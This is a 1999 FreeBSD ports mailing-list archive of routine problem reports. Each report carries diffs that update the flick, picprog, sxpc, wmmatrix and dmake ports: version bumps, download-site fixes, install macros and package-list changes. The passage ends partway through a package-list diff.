Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D0537157EF for ; Fri, 17 Dec 1999 12:00:05 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA81039; Fri, 17 Dec 1999 12:00:05 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 8B1E414BDE; Fri, 17 Dec 1999 11:53:07 -0800 (PST) Message-Id: <19991217195307.8B1E414BDE@hub.freebsd.org> Date: Fri, 17 Dec 1999 11:53:07 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15535: Update port: devel/flick to 2.1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15535 >Category: ports >Synopsis: Update port: devel/flick to 2.1 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 12:00:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Updated version 2.0 to 2.1 >How-To-Repeat: >Fix: diff -urN /usr/ports/devel/flick/Makefile devel/flick/Makefile --- /usr/ports/devel/flick/Makefile Mon Sep 27 19:12:44 1999 +++ devel/flick/Makefile Fri Dec 17 06:12:49 1999 @@ -1,15 +1,15 @@ # New ports collection makefile for: flick -# Version required: 2.0 +# Version required: 2.1 # Date created: 21 Mar 1998 # Whom: giffunip@asme.org # # $FreeBSD: ports/devel/flick/Makefile,v 1.5 1999/09/27 02:27:33 steve Exp $ # -DISTNAME= flick-2.0-src -PKGNAME= flick-2.0 +DISTNAME= flick-2.1-src +PKGNAME= flick-2.1 CATEGORIES= devel -MASTER_SITES= ftp://flux.cs.utah.edu/flux/flick/2.0/ +MASTER_SITES= ftp://flux.cs.utah.edu/flux/flick/2.1/ MAINTAINER= ports@FreeBSD.org @@ -17,7 +17,7 @@ USE_GMAKE= yes MAKEFILE= GNUmakefile -WRKSRC= ${WRKDIR}/${PKGNAME} +WRKSRC= ${WRKDIR}/${PKGNAME} post-install: .if !defined(NOPORTDOCS) diff -urN /usr/ports/devel/flick/files/md5 devel/flick/files/md5 --- /usr/ports/devel/flick/files/md5 Mon Sep 27 19:12:44 1999 +++ devel/flick/files/md5 Fri Dec 17 06:14:42 1999 @@ -1 +1 @@ -MD5 (flick-2.0-src.tar.gz) = cfc2b9b9ccdc08cfe0cde29c1b603169 +MD5 (flick-2.1-src.tar.gz) = 2e71b72dbe1d7bebb30fc4ebd5ef4a31 diff -urN /usr/ports/devel/flick/pkg/PLIST devel/flick/pkg/PLIST --- /usr/ports/devel/flick/pkg/PLIST Mon Sep 27 19:12:44 1999 +++ devel/flick/pkg/PLIST Fri Dec 17 08:08:12 1999 @@ -31,6 +31,7 @@ include/flick/pres/all.h include/flick/pres/corba.h include/flick/pres/corbaxx.h +include/flick/pres/flick_defs.scml include/flick/pres/mig.h include/flick/pres/mom.h include/flick/pres/std_defines.scml @@ -42,6 +43,7 @@ include/flick/pres/tao_interface.scml include/flick/pres/tao_sequence.scml include/flick/pres/tao_struct.scml +include/flick/pres/tao_stubs.scml include/flick/pres/tao_union.scml lib/libflick-iiop.a lib/libflick-suntcp.a >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 12: 0:15 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B49F5157F3 for ; Fri, 17 Dec 1999 12:00:06 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA81052; Fri, 17 Dec 1999 12:00:06 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 71491157B6; Fri, 17 Dec 1999 11:54:35 -0800 (PST) Message-Id: <19991217195435.71491157B6@hub.freebsd.org> Date: Fri, 17 Dec 1999 11:54:35 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15536: Update port: devel/picprog Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15536 >Category: ports >Synopsis: Update port: devel/picprog >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 12:00:05 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Modified patches to support install macros * Added WWW: line into pkg/DESCR >How-To-Repeat: >Fix: diff -urN /usr/ports/devel/picprog/patches/patch-ab devel/picprog/patches/patch-ab --- /usr/ports/devel/picprog/patches/patch-ab Mon Nov 1 13:03:47 1999 +++ devel/picprog/patches/patch-ab Fri Dec 17 07:02:59 1999 @@ -27,5 +27,5 @@ -ifeq (.depend,$(wildcard .depend)) -include .depend -endif -+ install -c -o 0 -g 0 -m 755 -s $(PROG) $(PREFIX)/bin -+ install -c -o 0 -g 0 -m 444 *.1 $(PREFIX)/man/man1 ++ ${BSD_INSTALL_PROGRAM} $(PROG) $(PREFIX)/bin ++ ${BSD_INSTALL_MAN} picprog.1 $(PREFIX)/man/man1 diff -urN /usr/ports/devel/picprog/pkg/DESCR devel/picprog/pkg/DESCR --- /usr/ports/devel/picprog/pkg/DESCR Mon Nov 1 13:03:47 1999 +++ devel/picprog/pkg/DESCR Fri Dec 17 06:19:38 1999 @@ -8,13 +8,12 @@ Full manual: see file /usr/local/share/doc/picprog/picprog.html - or The author may be contacted at: Email: Jaakko.Hyvatti@iki.fi - URL: http://www.iki.fi/hyvatti/ - Phone: +358 40 5011222 Remember: this is not a production quality programmer! See PIC16C84 data sheet for more information. + +WWW: http://www.pp.htv.fi/jhyvatti/sw/ >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 12: 0:20 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 73631157F5 for ; Fri, 17 Dec 1999 12:00:07 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA81061; Fri, 17 Dec 1999 12:00:07 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id CAE6E157B8; Fri, 17 Dec 1999 11:56:04 -0800 (PST) Message-Id: <19991217195604.CAE6E157B8@hub.freebsd.org> Date: Fri, 17 Dec 1999 11:56:04 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15537: Update port: x11/sxpc Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15537 >Category: ports >Synopsis: Update port: x11/sxpc >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 12:00:06 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Fixed MASTER_SITES >How-To-Repeat: >Fix: diff -urN /usr/ports/x11/sxpc/Makefile x11/sxpc/Makefile --- /usr/ports/x11/sxpc/Makefile Tue Aug 31 19:19:02 1999 +++ x11/sxpc/Makefile Sat Dec 18 00:03:19 1999 @@ -1,4 +1,4 @@ -# New ports collection Makefile for: sxpc +# New ports collection Makefile for: sxpc # Version required: 1.4 # Date created: 22nd March 1995 # Whom: jkh@FreeBSD.org @@ -8,14 +8,18 @@ DISTNAME= sxpc-1.4 CATEGORIES= x11 -MASTER_SITES= ftp://ftp.x.org/R5contrib/ +MASTER_SITES= ${MASTER_SITE_XCONTRIB} +MASTER_SITE_SUBDIR= utilities EXTRACT_SUFX= .shar.Z +MAINTAINER= ports@FreeBSD.org + +USE_IMAKE= yes NO_WRKSUBDIR= yes -EXTRACT_CMD= zcat -EXTRACT_BEFORE_ARGS= +EXTRACT_CMD= ${GZIP_CMD} +EXTRACT_BEFORE_ARGS= -dc EXTRACT_AFTER_ARGS= |sh -USE_IMAKE= yes + MAN1= sxpc.1 .include >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 12: 0:27 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 43555157F8 for ; Fri, 17 Dec 1999 12:00:08 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA81070; Fri, 17 Dec 1999 12:00:08 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 7B9351579C; Fri, 17 Dec 1999 11:59:26 -0800 (PST) Message-Id: <19991217195926.7B9351579C@hub.freebsd.org> Date: Fri, 17 Dec 1999 11:59:26 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15538: Update port: x11/wmmatrix Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15538 >Category: ports >Synopsis: Update port: x11/wmmatrix >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 12:00:07 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Changed file name to use lower case only * Modified patches/to support X11BASE properly * Added WWW: line into pkg/DESCR >How-To-Repeat: >Fix: diff -urN /usr/ports/x11/wmmatrix/Makefile x11/wmmatrix/Makefile --- /usr/ports/x11/wmmatrix/Makefile Wed Nov 3 10:33:51 1999 +++ x11/wmmatrix/Makefile Sat Dec 18 00:23:46 1999 @@ -1,5 +1,5 @@ # New ports collection makefile for: wmMatrix -# Version required: 0.2 +# Version required: 0.2 # Date created: 13 October 1999 # Whom: Brian Handy # @@ -17,5 +17,8 @@ USE_GMAKE= yes USE_X_PREFIX= yes ALL_TARGET= clean all + +do-install: + ${INSTALL_PROGRAM} ${WRKSRC}/wmMatrix ${PREFIX}/bin/wmmatrix .include diff -urN /usr/ports/x11/wmmatrix/patches/patch-aa x11/wmmatrix/patches/patch-aa --- /usr/ports/x11/wmmatrix/patches/patch-aa Wed Nov 3 10:33:52 1999 +++ x11/wmmatrix/patches/patch-aa Sat Dec 18 00:29:02 1999 @@ -1,14 +1,16 @@ ---- Makefile.orig Mon Aug 16 10:01:58 1999 -+++ Makefile Wed Oct 13 17:20:45 1999 -@@ -1,7 +1,8 @@ +--- Makefile.orig Tue Aug 17 01:01:58 1999 ++++ Makefile Sat Dec 18 00:11:18 1999 +@@ -1,8 +1,8 @@ -CC = gcc -CFLAGS = -O2 -Wall +-INCDIR = -I/usr/X11R6/include/X11 -I/usr/X11R6/include +-DESTDIR= /usr/X11R6 +-LIBDIR = -L/usr/X11R6/lib +CC ?= gcc +CFLAGS ?= -O2 -Wall -+CFLAGS += -Wall - INCDIR = -I/usr/X11R6/include/X11 -I/usr/X11R6/include --DESTDIR= /usr/X11R6 ++INCDIR = -I${X11BASE}/include +DESTDIR= ${PREFIX} - LIBDIR = -L/usr/X11R6/lib ++LIBDIR = -L${X11BASE}/lib # for Linux + LIBS = -lXpm -lX11 -lXext diff -urN /usr/ports/x11/wmmatrix/pkg/DESCR x11/wmmatrix/pkg/DESCR --- /usr/ports/x11/wmmatrix/pkg/DESCR Wed Nov 3 10:33:52 1999 +++ x11/wmmatrix/pkg/DESCR Sat Dec 18 00:14:09 1999 @@ -3,3 +3,5 @@ Author: Mike Henderson + +WWW: http://nis-www.lanl.gov/~mgh/WindowMaker/DockApps.shtml diff -urN /usr/ports/x11/wmmatrix/pkg/PLIST x11/wmmatrix/pkg/PLIST --- /usr/ports/x11/wmmatrix/pkg/PLIST Wed Nov 3 10:33:52 1999 +++ x11/wmmatrix/pkg/PLIST Sat Dec 18 00:13:11 1999 @@ -1 +1 @@ -bin/wmMatrix +bin/wmmatrix >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 12: 0:33 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B8DB3157E7 for ; Fri, 17 Dec 1999 12:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA81011; Fri, 17 Dec 1999 12:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id AE97214CB8; Fri, 17 Dec 1999 11:51:55 -0800 (PST) Message-Id: <19991217195155.AE97214CB8@hub.freebsd.org> Date: Fri, 17 Dec 1999 11:51:55 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15534: Update port: devel/dmake Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15534 >Category: ports >Synopsis: Update port: devel/dmake >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 12:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Added secondary site to MASTER_SITES * Moved install path of data files from lib/ to share/ * Modified patches to support CC/CFLAGS properly New file: patches/patch-ad >How-To-Repeat: >Fix: diff -urN /usr/ports/devel/dmake/Makefile devel/dmake/Makefile --- /usr/ports/devel/dmake/Makefile Tue Aug 31 19:13:21 1999 +++ devel/dmake/Makefile Fri Dec 17 05:51:35 1999 @@ -1,5 +1,5 @@ # New ports collection makefile for: dmake -# Version required: 4.1 +# Version required: 4.1 # Date created: 31 July 1995 # Whom: nils@guru.ims.uni-stuttgart.de # @@ -9,28 +9,30 @@ DISTNAME= dmake-v4.1-src-export.all-unknown-all PKGNAME= dmake-4.1 CATEGORIES= devel -MASTER_SITES= ftp://plg.uwaterloo.ca/pub/dmake/ +MASTER_SITES= ftp://plg.uwaterloo.ca/pub/dmake/ \ + http://dmake.wticorp.com/SourceDistribution/ MAINTAINER= ports@FreeBSD.org WRKSRC= ${WRKDIR}/dmake USE_GMAKE= yes +MAKE_ENV= CC=${CC} MAKEFILE= makefile ALL_TARGET= bsd43 MAN1= dmake.1 -do-configure: +post-extract: .for f in limits.h string.h dirent.h - @${RM} -f ${WRKSRC}/unix/bsd43/$f + @${RM} -f ${WRKSRC}/unix/bsd43/${f} .endfor - @${CP} ${WRKSRC}/unix/startup.h ${WRKSRC}/unix/startup.h.orig - @${SED} s:/usr/local:${PREFIX}: ${WRKSRC}/unix/startup.h.orig \ - > ${WRKSRC}/unix/startup.h + +post-patch: + @${PERL} -pi -e 's|%%PREFIX%%|${PREFIX}|g' ${WRKSRC}/unix/startup.h do-install: ${INSTALL_PROGRAM} ${WRKSRC}/dmake ${PREFIX}/bin ${INSTALL_MAN} ${WRKSRC}/man/dmake.tf ${PREFIX}/man/man1/dmake.1 - ${MKDIR} ${PREFIX}/lib/dmake/startup - ${CP} -R ${WRKSRC}/startup/* ${PREFIX}/lib/dmake/startup + @${MKDIR} ${PREFIX}/share/dmake/startup + ${CP} -R ${WRKSRC}/startup/* ${PREFIX}/share/dmake/startup .include diff -urN /usr/ports/devel/dmake/patches/patch-aa devel/dmake/patches/patch-aa --- /usr/ports/devel/dmake/patches/patch-aa Mon Sep 8 05:23:09 1997 +++ devel/dmake/patches/patch-aa Fri Dec 17 05:27:56 1999 @@ -1,14 +1,86 @@ --- unix/bsd43/make.sh.orig Wed Jul 16 01:02:35 1997 -+++ unix/bsd43/make.sh Mon Sep 8 03:01:42 1997 -@@ -1,3 +1,5 @@ ++++ unix/bsd43/make.sh Fri Dec 17 05:27:21 1999 +@@ -1,69 +1,64 @@ +if [ ! -x dmake ] +then mkdir objects - cc -c -I. -Iunix -Iunix/bsd43 -O infer.c +-cc -c -I. -Iunix -Iunix/bsd43 -O infer.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 infer.c mv infer.o objects -@@ -51,19 +53,12 @@ +-cc -c -I. -Iunix -Iunix/bsd43 -O make.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 make.c + mv make.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O stat.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 stat.c + mv stat.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O expand.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 expand.c + mv expand.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O dmstring.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 dmstring.c + mv dmstring.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O hash.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 hash.c + mv hash.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O dag.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 dag.c + mv dag.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O dmake.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 dmake.c + mv dmake.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O path.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 path.c + mv path.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O imacs.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 imacs.c + mv imacs.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O sysintf.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 sysintf.c + mv sysintf.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O parse.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 parse.c + mv parse.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O getinp.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 getinp.c + mv getinp.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O quit.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 quit.c + mv quit.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O state.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 state.c + mv state.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O dmdump.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 dmdump.c + mv dmdump.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O macparse.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 macparse.c + mv macparse.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O rulparse.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 rulparse.c + mv rulparse.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O percent.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 percent.c + mv percent.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O function.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 function.c + mv function.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O unix/arlib.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 unix/arlib.c + mv arlib.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O unix/dirbrk.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 unix/dirbrk.c + mv dirbrk.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O unix/rmprq.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 unix/rmprq.c + mv rmprq.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O unix/ruletab.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 unix/ruletab.c + mv ruletab.o objects +-cc -c -I. -Iunix -Iunix/bsd43 -O unix/runargv.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 unix/runargv.c mv runargv.o objects - cc -c -I. -Iunix -Iunix/bsd43 -O unix/dcache.c +-cc -c -I. -Iunix -Iunix/bsd43 -O unix/dcache.c ++${CC} ${CFLAGS} -c -I. -Iunix -Iunix/bsd43 unix/dcache.c mv dcache.o objects -cc -c -I. -Iunix -Iunix/bsd43 -O unix/bsd43/putenv.c -mv putenv.o objects @@ -18,7 +90,8 @@ -mv utime.o objects -cc -c -I. -Iunix -Iunix/bsd43 -O unix/bsd43/setvbuf.c -mv setvbuf.o objects - cc -O -o dmake objects/infer.o objects/make.o objects/stat.o objects/expand.o \ +-cc -O -o dmake objects/infer.o objects/make.o objects/stat.o objects/expand.o \ ++${CC} ${CFLAGS} -o dmake objects/infer.o objects/make.o objects/stat.o objects/expand.o \ objects/dmstring.o objects/hash.o objects/dag.o objects/dmake.o objects/path.o \ objects/imacs.o objects/sysintf.o objects/parse.o objects/getinp.o \ objects/quit.o objects/state.o objects/dmdump.o objects/macparse.o \ diff -urN /usr/ports/devel/dmake/patches/patch-ad devel/dmake/patches/patch-ad --- /usr/ports/devel/dmake/patches/patch-ad Thu Jan 1 09:00:00 1970 +++ devel/dmake/patches/patch-ad Fri Dec 17 05:50:21 1999 @@ -0,0 +1,8 @@ +--- unix/startup.h.orig Wed Jul 16 01:02:34 1997 ++++ unix/startup.h Fri Dec 17 05:36:20 1999 +@@ -24,4 +24,4 @@ + -- Use cvs log to obtain detailed change logs. + */ + +-"MAKESTARTUP := $(ROOTDIR)/usr/local/lib/dmake/startup/startup.mk", ++"MAKESTARTUP := $(ROOTDIR)%%PREFIX%%/share/dmake/startup/startup.mk", diff -urN /usr/ports/devel/dmake/pkg/PLIST devel/dmake/pkg/PLIST --- /usr/ports/devel/dmake/pkg/PLIST Wed Aug 12 19:22:07 1998 +++ devel/dmake/pkg/PLIST Fri Dec 17 05:40:46 1999 @@ -1,165 +1,165 @@ bin/dmake -lib/dmake/startup/templates/tos/template.mk -lib/dmake/startup/templates/msdos/borland/bcc30/template.mk -lib/dmake/startup/templates/msdos/borland/bcc40/template.mk -lib/dmake/startup/templates/msdos/borland/bcc45/template.mk -lib/dmake/startup/templates/msdos/borland/bcc50/template.mk -lib/dmake/startup/templates/msdos/borland/tcc20/template.mk -lib/dmake/startup/templates/msdos/microsft/msc51/template.mk -lib/dmake/startup/templates/msdos/microsft/msc60/template.mk -lib/dmake/startup/templates/os2/ibm/icc/template.mk -lib/dmake/startup/templates/qssl/template.mk -lib/dmake/startup/templates/mac/template.mk -lib/dmake/startup/templates/unix/solaris/gnu/template.mk -lib/dmake/startup/templates/unix/solaris/template.mk -lib/dmake/startup/templates/unix/bsd43/uw/template.mk -lib/dmake/startup/templates/unix/bsd43/vf/template.mk -lib/dmake/startup/templates/unix/bsd43/template.mk -lib/dmake/startup/templates/unix/coherent/ver40/template.mk -lib/dmake/startup/templates/unix/coherent/ver42/template.mk -lib/dmake/startup/templates/unix/linux/gnu/template.mk -lib/dmake/startup/templates/unix/386ix/template.mk -lib/dmake/startup/templates/unix/sysvr1/template.mk -lib/dmake/startup/templates/unix/sysvr3/pwd/template.mk -lib/dmake/startup/templates/unix/sysvr3/template.mk -lib/dmake/startup/templates/unix/sysvr4/template.mk -lib/dmake/startup/templates/unix/xenix/pwd/template.mk -lib/dmake/startup/templates/unix/xenix/template.mk -lib/dmake/startup/templates/win95/borland/bcc50/template.mk -lib/dmake/startup/templates/win95/microsft/vpp40/template.mk -lib/dmake/startup/templates/winnt/borland/bcc50/template.mk -lib/dmake/startup/templates/winnt/microsft/vpp40/template.mk -lib/dmake/startup/win95/borland/macros.mk -lib/dmake/startup/win95/microsft/macros.mk -lib/dmake/startup/win95/macros.mk -lib/dmake/startup/win95/recipes.mk -lib/dmake/startup/unix/386ix/macros.mk -lib/dmake/startup/unix/bsd43/macros.mk -lib/dmake/startup/unix/bsd43/recipes.mk -lib/dmake/startup/unix/coherent/macros.mk -lib/dmake/startup/unix/coherent/recipes.mk -lib/dmake/startup/unix/linux/gnu/macros.mk -lib/dmake/startup/unix/linux/macros.mk -lib/dmake/startup/unix/sysvr3/gnu/macros.mk -lib/dmake/startup/unix/sysvr3/macros.mk -lib/dmake/startup/unix/sysvr4/macros.mk -lib/dmake/startup/unix/solaris/macros.mk -lib/dmake/startup/unix/sysvr1/macros.mk -lib/dmake/startup/unix/xenix/macros.mk -lib/dmake/startup/unix/recipes.mk -lib/dmake/startup/unix/macros.mk -lib/dmake/startup/tos/macros.mk -lib/dmake/startup/os2/ibm/macros.mk -lib/dmake/startup/os2/macros.mk -lib/dmake/startup/winnt/borland/macros.mk -lib/dmake/startup/winnt/microsft/macros.mk -lib/dmake/startup/winnt/macros.mk -lib/dmake/startup/winnt/recipes.mk -lib/dmake/startup/mac/macros.mk -lib/dmake/startup/msdos/borland/tcc20/macros.mk -lib/dmake/startup/msdos/borland/bcc40/macros.mk -lib/dmake/startup/msdos/borland/bcc45/macros.mk -lib/dmake/startup/msdos/borland/bcc30/macros.mk -lib/dmake/startup/msdos/borland/bcc50/macros.mk -lib/dmake/startup/msdos/borland/bcc50.32/macros.mk -lib/dmake/startup/msdos/borland/macros.mk -lib/dmake/startup/msdos/microsft/macros.mk -lib/dmake/startup/msdos/zortech/macros.mk -lib/dmake/startup/msdos/macros.mk -lib/dmake/startup/msdos/recipes.mk -lib/dmake/startup/qssl/qnx/macros.mk -lib/dmake/startup/qssl/qnx/recipes.mk -lib/dmake/startup/qssl/macros.mk -lib/dmake/startup/qssl/recipes.mk -lib/dmake/startup/Windows_NT/borland/macros.mk -lib/dmake/startup/Windows_NT/microsft/macros.mk -lib/dmake/startup/Windows_NT/macros.mk -lib/dmake/startup/Windows_NT/recipes.mk -lib/dmake/startup/startup.mk -lib/dmake/startup/summary -lib/dmake/startup/config.mk -lib/dmake/startup/template.mk -@dirrm lib/dmake/startup/winnt/microsft -@dirrm lib/dmake/startup/winnt/borland -@dirrm lib/dmake/startup/winnt -@dirrm lib/dmake/startup/win95/microsft -@dirrm lib/dmake/startup/win95/borland -@dirrm lib/dmake/startup/win95 -@dirrm lib/dmake/startup/unix/xenix -@dirrm lib/dmake/startup/unix/sysvr4 -@dirrm lib/dmake/startup/unix/sysvr3/gnu -@dirrm lib/dmake/startup/unix/sysvr3 -@dirrm lib/dmake/startup/unix/sysvr1 -@dirrm lib/dmake/startup/unix/solaris -@dirrm lib/dmake/startup/unix/linux/gnu -@dirrm lib/dmake/startup/unix/linux -@dirrm lib/dmake/startup/unix/coherent -@dirrm lib/dmake/startup/unix/bsd43 -@dirrm lib/dmake/startup/unix/386ix -@dirrm lib/dmake/startup/unix -@dirrm lib/dmake/startup/tos -@dirrm lib/dmake/startup/templates/winnt/microsft/vpp40 -@dirrm lib/dmake/startup/templates/winnt/microsft -@dirrm lib/dmake/startup/templates/winnt/borland/bcc50 -@dirrm lib/dmake/startup/templates/winnt/borland -@dirrm lib/dmake/startup/templates/winnt -@dirrm lib/dmake/startup/templates/win95/microsft/vpp40 -@dirrm lib/dmake/startup/templates/win95/microsft -@dirrm lib/dmake/startup/templates/win95/borland/bcc50 -@dirrm lib/dmake/startup/templates/win95/borland -@dirrm lib/dmake/startup/templates/win95 -@dirrm lib/dmake/startup/templates/unix/xenix/pwd -@dirrm lib/dmake/startup/templates/unix/xenix -@dirrm lib/dmake/startup/templates/unix/sysvr4 -@dirrm lib/dmake/startup/templates/unix/sysvr3/pwd -@dirrm lib/dmake/startup/templates/unix/sysvr3 -@dirrm lib/dmake/startup/templates/unix/sysvr1 -@dirrm lib/dmake/startup/templates/unix/solaris/gnu -@dirrm lib/dmake/startup/templates/unix/solaris -@dirrm lib/dmake/startup/templates/unix/linux/gnu -@dirrm lib/dmake/startup/templates/unix/linux -@dirrm lib/dmake/startup/templates/unix/coherent/ver42 -@dirrm lib/dmake/startup/templates/unix/coherent/ver40 -@dirrm lib/dmake/startup/templates/unix/coherent -@dirrm lib/dmake/startup/templates/unix/bsd43/vf -@dirrm lib/dmake/startup/templates/unix/bsd43/uw -@dirrm lib/dmake/startup/templates/unix/bsd43 -@dirrm lib/dmake/startup/templates/unix/386ix -@dirrm lib/dmake/startup/templates/unix -@dirrm lib/dmake/startup/templates/tos -@dirrm 